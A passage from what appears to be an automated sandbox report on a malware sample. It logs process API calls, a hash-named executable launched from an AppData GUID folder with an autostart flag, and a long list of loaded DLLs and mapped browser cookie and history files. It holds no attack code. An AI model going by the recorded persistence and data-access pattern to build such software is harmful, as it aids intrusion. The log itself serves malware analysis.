[54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0166.476] ResumeThread (hThread=0x74) returned 0x1 [0166.527] CloseHandle (hObject=0x74) returned 1 [0166.527] CloseHandle (hObject=0x78) returned 1 [0166.527] ExitProcess (uExitCode=0x0) [0166.531] HeapFree (in: hHeap=0x4060000, dwFlags=0x0, lpMem=0x40607d0 | out: hHeap=0x4060000) returned 1 Process: id = "11" image_name = "12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" filename = "c:\\users\\keecfmwgj\\appdata\\local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" page_root = "0xe850000" os_pid = "0x7d8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x778" cmd_line = "\"C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" --AutoStart" cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f454" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1859 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1860 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1861 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1862 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1863 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1864 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1865 start_va = 0x400000 end_va = 0x253bfff monitored = 1 entry_point = 0x498440 region_type = mapped_file name = "12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe") Region: id = 1866 start_va = 0x77280000 end_va = 0x77428fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1867 start_va = 0x77460000 end_va = 0x775dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1868 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1869 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1870 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1871 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1872 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1873 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1874 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1875 start_va = 0x400000 end_va = 0x536fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1876 start_va = 0x1a0000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1877 start_va = 0x73bf0000 end_va = 0x73c2efff monitored = 0 entry_point = 0x73c1e088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1878 start_va = 0x73b90000 end_va = 0x73bebfff monitored = 0 entry_point = 0x73bcf9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1879 start_va = 0x73b80000 end_va = 0x73b87fff monitored = 0 entry_point = 0x73b820f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1880 start_va = 0x77160000 end_va = 0x7727efff monitored = 0 entry_point = 0x77175340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1881 start_va = 0x76680000 end_va = 0x7678ffff monitored = 0 entry_point = 0x76693283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1882 start_va = 0x77160000 end_va = 0x7727efff monitored = 0 entry_point = 0x77175340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1883 start_va = 0x77160000 end_va = 0x7727efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077160000" filename = "" Region: id = 1884 start_va = 0x77060000 end_va = 0x77159fff monitored = 0 entry_point = 0x7707a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1885 start_va = 0x77060000 end_va = 0x77159fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077060000" filename = "" Region: id = 1886 start_va = 0x540000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1887 start_va = 0x76680000 end_va = 0x7678ffff monitored = 0 entry_point = 0x76693283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1888 start_va = 0x76ab0000 end_va = 0x76af6fff monitored = 0 entry_point = 0x76ab74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1889 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1890 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1891 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1892 start_va = 0x1a0000 end_va = 0x206fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1893 start_va = 0x300000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 1894 start_va = 0x75850000 end_va = 0x7593ffff monitored = 0 entry_point = 0x75860569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1895 start_va = 0x74fb0000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74fca3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1896 start_va = 0x76960000 end_va = 0x76a0bfff monitored = 0 entry_point = 0x7696a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1897 start_va = 0x74fa0000 end_va = 0x74fabfff monitored = 0 entry_point = 0x74fa10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1898 start_va = 0x76b00000 end_va = 0x76b18fff monitored = 0 entry_point = 0x76b04975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1899 start_va = 0x74ed0000 end_va = 0x74ee1fff monitored = 0 entry_point = 0x74ed1200 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 1900 start_va = 0x75430000 end_va = 0x75524fff monitored = 0 entry_point = 0x75431865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 1901 start_va = 0x76620000 end_va = 0x76676fff monitored = 0 entry_point = 0x76639ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1902 start_va = 0x75940000 end_va = 0x759cffff monitored = 0 entry_point = 0x75956343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1903 start_va = 0x75330000 end_va = 0x7542ffff monitored = 0 entry_point = 0x7534b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1904 start_va = 0x75780000 end_va = 0x7581ffff monitored = 0 entry_point = 0x757949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1905 start_va = 0x76a10000 end_va = 0x76a19fff monitored = 0 entry_point = 0x76a136a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1906 start_va = 0x751a0000 end_va = 0x7523cfff monitored = 0 entry_point = 0x751d3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1907 start_va = 0x76820000 end_va = 0x76955fff monitored = 0 entry_point = 0x76821b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 1908 start_va = 0x76c50000 end_va = 0x76dabfff monitored = 0 entry_point = 0x76c9ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1909 start_va = 0x76db0000 end_va = 0x76e3efff monitored = 0 entry_point = 0x76db3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1910 start_va = 0x75020000 end_va = 0x75140fff monitored = 0 entry_point = 0x7502158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1911 start_va = 0x76a20000 end_va = 0x76a2bfff monitored = 0 entry_point = 0x76a2238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 1912 start_va = 0x75530000 end_va = 0x7572afff monitored = 0 entry_point = 0x755322d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 1913 start_va = 0x74f50000 end_va = 0x74f81fff monitored = 0 entry_point = 0x74f537f1 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\SysWOW64\\winmm.dll" (normalized: "c:\\windows\\syswow64\\winmm.dll") Region: id = 1914 start_va = 0x759d0000 end_va = 0x76619fff monitored = 0 entry_point = 0x75a51601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1915 start_va = 0x74f30000 end_va = 0x74f4bfff monitored = 0 entry_point = 0x74f3a431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1916 start_va = 0x75010000 end_va = 0x75015fff monitored = 0 entry_point = 0x75011782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1917 start_va = 0x74f20000 end_va = 0x74f26fff monitored = 0 entry_point = 0x74f2128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 1918 start_va = 0x75150000 end_va = 0x75184fff monitored = 0 entry_point = 0x7515145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1919 start_va = 0x74e80000 end_va = 0x74ec3fff monitored = 0 entry_point = 0x74e963f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 1920 start_va = 0x210000 end_va = 0x2affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1921 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1922 start_va = 0x7a0000 end_va = 0x927fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 1923 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1924 start_va = 0x76fe0000 end_va = 0x7703ffff monitored = 0 entry_point = 0x76ff158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1925 start_va = 0x76b80000 end_va = 0x76c4bfff monitored = 0 entry_point = 0x76b8168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1926 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1927 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1928 start_va = 0x930000 end_va = 0xab0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 1929 start_va = 0xac0000 end_va = 0x1ebffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ac0000" filename = "" Region: id = 1930 start_va = 0x1ec0000 end_va = 0x20affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ec0000" filename = "" Region: id = 1931 start_va = 0x210000 end_va = 0x211fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 1932 start_va = 0x2a0000 end_va = 0x2affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 1933 start_va = 0x74ce0000 end_va = 0x74e7dfff monitored = 0 entry_point = 0x74d0e6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 1934 start_va = 0x220000 end_va = 0x220fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1935 start_va = 0x230000 end_va = 0x231fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 1936 start_va = 0x20b0000 end_va = 0x237efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1937 start_va = 0x220000 end_va = 0x220fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 1938 start_va = 0x74f10000 end_va = 0x74f1afff monitored = 0 entry_point = 0x74f11992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1939 start_va = 0x240000 end_va = 0x27ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 1940 start_va = 0x280000 end_va = 0x28ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 1941 start_va = 0x540000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1942 start_va = 0x6a0000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 1943 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 1944 start_va = 0x290000 end_va = 0x297fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 1945 start_va = 0x2b0000 end_va = 0x2c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 1946 start_va = 0x74cb0000 end_va = 0x74cd0fff monitored = 0 entry_point = 0x74cb145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 1947 start_va = 0x75730000 end_va = 0x75774fff monitored = 0 entry_point = 0x757311e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 1948 start_va = 0x75190000 end_va = 0x75192fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\SysWOW64\\normaliz.dll" (normalized: "c:\\windows\\syswow64\\normaliz.dll") Region: id = 1949 start_va = 0x380000 end_va = 0x3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 1950 start_va = 0x1ec0000 end_va = 0x1fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ec0000" filename = "" Region: id = 1951 start_va = 0x2070000 end_va = 0x20affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002070000" filename = "" Region: id = 1952 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 1953 start_va = 0x74c50000 end_va = 0x74ca1fff monitored = 0 entry_point = 0x74c514be region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll") Region: id = 1954 start_va = 0x74ef0000 end_va = 0x74f04fff monitored = 0 entry_point = 0x74ef12de region_type = mapped_file name = "rasman.dll" 